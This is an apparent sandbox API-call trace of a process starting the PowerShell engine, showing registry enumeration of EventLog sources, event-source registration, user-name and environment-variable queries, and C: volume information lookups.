	[0290.093] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.093] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x368) returned 0x0
	[0290.093] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.093] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x36c) returned 0x0
	[0290.093] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.093] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x370) returned 0x0
	[0290.093] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.093] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x374) returned 0x0
	[0290.093] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x378) returned 0x0
	[0290.094] RegCloseKey (hKey=0x378) returned 0x0
	[0290.094] RegCloseKey (hKey=0x350) returned 0x0
	[0290.094] RegCloseKey (hKey=0x374) returned 0x0
	[0290.095] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd568 | out: phkResult=0xcd568*=0x374) returned 0x0
	[0290.095] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.095] CoTaskMemFree (pv=0x0) 
	[0290.095] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.095] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.095] CoTaskMemFree (pv=0x1766d0) 
	[0290.095] CoTaskMemFree (pv=0x0) 
	[0290.095] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.095] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.095] CoTaskMemFree (pv=0x1766d0) 
	[0290.095] CoTaskMemFree (pv=0x0) 
	[0290.095] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.095] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.096] CoTaskMemFree (pv=0x1766d0) 
	[0290.096] CoTaskMemFree (pv=0x0) 
	[0290.096] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.096] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.096] CoTaskMemFree (pv=0x1766d0) 
	[0290.096] CoTaskMemFree (pv=0x0) 
	[0290.096] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.096] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.096] CoTaskMemFree (pv=0x1766d0) 
	[0290.096] CoTaskMemFree (pv=0x0) 
	[0290.096] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.096] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.096] CoTaskMemFree (pv=0x1766d0) 
	[0290.096] CoTaskMemFree (pv=0x0) 
	[0290.096] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.096] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.096] CoTaskMemFree (pv=0x1766d0) 
	[0290.097] CoTaskMemFree (pv=0x0) 
	[0290.097] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.097] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.097] CoTaskMemFree (pv=0x1766d0) 
	[0290.097] CoTaskMemFree (pv=0x0) 
	[0290.097] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.097] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.097] CoTaskMemFree (pv=0x1766d0) 
	[0290.097] CoTaskMemFree (pv=0x0) 
	[0290.097] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x350) returned 0x0
	[0290.097] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.097] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x378) returned 0x0
	[0290.097] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.098] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x37c) returned 0x0
	[0290.098] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.098] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x380) returned 0x0
	[0290.098] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.098] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x384) returned 0x0
	[0290.098] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.098] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x388) returned 0x0
	[0290.098] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.098] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x38c) returned 0x0
	[0290.099] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.099] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x390) returned 0x0
	[0290.099] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.099] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x394) returned 0x0
	[0290.099] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x398) returned 0x0
	[0290.099] RegCloseKey (hKey=0x398) returned 0x0
	[0290.099] RegCloseKey (hKey=0x374) returned 0x0
	[0290.100] RegCloseKey (hKey=0x394) returned 0x0
	[0291.004] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd538 | out: phkResult=0xcd538*=0x394) returned 0x0
	[0291.004] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.004] CoTaskMemFree (pv=0x0) 
	[0291.004] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.004] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.004] CoTaskMemFree (pv=0x1766d0) 
	[0291.004] CoTaskMemFree (pv=0x0) 
	[0291.004] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.004] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.004] CoTaskMemFree (pv=0x1766d0) 
	[0291.004] CoTaskMemFree (pv=0x0) 
	[0291.004] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.005] CoTaskMemFree (pv=0x1766d0) 
	[0291.005] CoTaskMemFree (pv=0x0) 
	[0291.005] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.005] CoTaskMemFree (pv=0x1766d0) 
	[0291.005] CoTaskMemFree (pv=0x0) 
	[0291.005] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.005] CoTaskMemFree (pv=0x1766d0) 
	[0291.005] CoTaskMemFree (pv=0x0) 
	[0291.005] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.005] CoTaskMemFree (pv=0x1766d0) 
	[0291.005] CoTaskMemFree (pv=0x0) 
	[0291.005] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.005] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.005] CoTaskMemFree (pv=0x1766d0) 
	[0291.005] CoTaskMemFree (pv=0x0) 
	[0291.006] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.006] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.006] CoTaskMemFree (pv=0x1766d0) 
	[0291.006] CoTaskMemFree (pv=0x0) 
	[0291.006] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0291.006] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x1766d0, lpcchName=0xcd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.006] CoTaskMemFree (pv=0x1766d0) 
	[0291.006] CoTaskMemFree (pv=0x0) 
	[0291.006] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x374) returned 0x0
	[0291.006] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.006] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x398) returned 0x0
	[0291.006] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.006] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x39c) returned 0x0
	[0291.006] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.007] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3a0) returned 0x0
	[0291.007] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.007] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3a4) returned 0x0
	[0291.007] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.007] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3a8) returned 0x0
	[0291.007] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.007] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3ac) returned 0x0
	[0291.007] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.007] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3b0) returned 0x0
	[0291.007] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x0) returned 0x2
	[0291.008] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3b4) returned 0x0
	[0291.008] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd598 | out: phkResult=0xcd598*=0x3b8) returned 0x0
	[0291.008] RegCloseKey (hKey=0x3b8) returned 0x0
	[0291.008] RegCloseKey (hKey=0x394) returned 0x0
	[0291.008] RegCloseKey (hKey=0x3b4) returned 0x0
	[0291.013] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba10008
	[0291.022] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x325cc28*="WSMan", lpRawData=0x325c998) returned 1
	[0292.626] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.626] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.646] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0292.647] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0292.647] CoTaskMemFree (pv=0x12d3c0) 
	[0292.647] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0292.647] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0292.647] CoTaskMemFree (pv=0x1766d0) 
	[0292.648] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d4c5a0*="Alias", lpRawData=0x2d4c330) returned 1
	[0292.662] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.662] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.664] CoTaskMemAlloc (cb=0x804) returned 0x12d3c0
	[0292.664] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12d3c0, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0292.665] CoTaskMemFree (pv=0x12d3c0) 
	[0292.665] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0292.665] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0292.665] CoTaskMemFree (pv=0x1766d0) 
	[0292.666] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d51b98*="Environment", lpRawData=0x2d51928) returned 1
	[0292.719] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.719] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.720] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.720] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0292.720] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.720] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0292.720] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0292.720] CoTaskMemFree (pv=0x1b8429c0) 
	[0292.721] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0292.721] SetErrorMode (uMode=0x1) returned 0x1
	[0292.721] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd5e0 | out: lpFileInformation=0xcd5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.721] SetErrorMode (uMode=0x1) returned 0x1
	[0292.722] GetLogicalDrives () returned 0x4
	[0292.723] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.724] SetErrorMode (uMode=0x1) returned 0x1
	[0292.725] CoTaskMemAlloc (cb=0x68) returned 0x1b835970
	[0292.725] CoTaskMemAlloc (cb=0x68) returned 0x1b835d60
	[0292.725] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b835970, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd5b0, lpMaximumComponentLength=0xcd5ac, lpFileSystemFlags=0xcd5a8, lpFileSystemNameBuffer=0x1b835d60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd5b0*=0x9c354b42, lpMaximumComponentLength=0xcd5ac*=0xff, lpFileSystemFlags=0xcd5a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0292.725] CoTaskMemFree (pv=0x1b835970) 
	[0292.725] CoTaskMemFree (pv=0x1b835d60) 
	[0292.725] SetErrorMode (uMode=0x1) returned 0x1
